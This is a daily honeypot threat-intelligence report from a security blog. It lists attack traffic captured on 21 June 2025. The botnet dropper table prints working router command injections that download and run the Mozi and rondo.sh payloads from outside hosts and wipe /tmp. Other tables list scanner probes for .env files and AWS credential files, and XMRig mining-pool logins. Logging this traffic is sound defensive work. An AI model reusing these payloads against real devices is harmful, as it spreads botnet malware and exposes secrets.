Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-21

·525 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-21
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 48 new requests that have never been observed before (these were added to the monitored request database.).

A total of 863 requests were recorded during the day, originating from 3 different countries, with a peak of 220 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
SGGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
77.239.211.9227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
175.107.1.120GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.120:49904/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
224GET /conf.env HTTP/1.1
254GET /ses.env HTTP/1.1
383GET /page/style/index.css HTTP/1.1
682GET /.env.pgsql HTTP/1.1
692GET /.env.bak.1 HTTP/1.1
702GET /.env-usage HTTP/1.1
712GET /.env-event HTTP/1.1
732GET /.env-trace HTTP/1.1
742GET /.env.old.1 HTTP/1.1
752GET /.env.netrc HTTP/1.1
762GET /.env-queue HTTP/1.1
842GET /logon.env HTTP/1.1
852GET /m/.env HTTP/1.1
862GET /.env_panel HTTP/1.1
872GET /awstats.jsp HTTP/1.1
902GET /.env.azure HTTP/1.1
922GET /.aws/konfig HTTP/1.1
932GET /awstats.php HTTP/1.1
942GET /tmp/.env.db HTTP/1.1
962GET /aws/s3.yaml HTTP/1.1
972GET /awstats.txt HTTP/1.1
982GET /.aws/secret HTTP/1.1
992GET /.aws/.s3cfg HTTP/1.1
1002GET /storage.env HTTP/1.1
1042GET /yii/env.php HTTP/1.1
1092GET /.env-token HTTP/1.1
1341GET /crypto/ HTTP/1.1
1351GET /wallet/ HTTP/1.1
1381GET /payment/ HTTP/1.1
1391GET /dump/ HTTP/1.1
1411GET /usdt/ HTTP/1.1
1421GET /withdraw/ HTTP/1.1
1691GET /Odin/http/call1750468598 HTTP/1.1
1911GET /odinhttpcall1750468598 HTTP/1.1
1931GET /OdinHttpCall1750468598 HTTP/1.1
1951{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x2b34297722808327901c27cdbfa2a16730e3bba4\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1961{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2249FnoPeFwQSJv7s63JRLMP7E2JNsQB4sW57uqUAyh3m7A8bjmoLTYMhioA148bTijtPXEq8xcBtJEb5RoPnV4LZHNd4iN5y\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2061GET /three-stickers-for-all HTTP/1.1
2671\x00\x0E\x08o\x8D\x890d\xBF\x8D\xE3\x00\x00\x00\x00\x00
2681\x00\x0E8o\x8D\x890d\xBF\x8D\xE3\x00\x00\x00\x00\x00
2711\x00\x0E\x08>%\x82\xE1\xD1v\xF1\x9C\x00\x00\x00\x00\x00
2721\x00\x0E8>%\x82\xE1\xD1v\xF1\x9C\x00\x00\x00\x00\x00
2921\x00\x0E\x08\xBE\xFF\xBE=\xC9\xD0\xBA\x86\x00\x00\x00\x00\x00
2931\x00\x0E8\xBE\xFF\xBE=\xC9\xD0\xBA\x86\x00\x00\x00\x00\x00
2961\x00\x0E\x08\x07\xD3\xD0\x0CL\xCB\x9B\x83\x00\x00\x00\x00\x00
2971\x00\x0E8\x07\xD3\xD0\x0CL\xCB\x9B\x83\x00\x00\x00\x00\x00
3001{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x8602ddf663141e59d80fb86fae4f37c9e73008f3\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
3011{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2243Apj7bamzWjdxdhAjT7B8LHrHwa2m6PXLX6CdFKG6toQasL5ct16z2Wq1e9rKPNo6SpvyeBAxBQdaGB61Gny6z9JUzc6S4\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}

country_iso_code
#

number_of_occurencecountry_iso_code
0220GB
1210US
298NL
368DE
447TW
545BG
624JP
721HK
815AU
912SC
1011GH
118NG
128PL
137RU
147ZA
156MD
166SG
175TR
185BE
195LT
203UA
213BR
222ES
232AE
242FI
252KZ
262IE
272TH
282SE
292IL
302ID
311IN
321CN
331KE
341CO
351KR
361MC
371IR
381FR
391PA
401AO
411PK

Related

Report: 2025-06-20
·340 words
Repport Daily
Report: 2025-06-19
·456 words
Repport Daily
Report: 2025-06-18
·2795 words
Repport Daily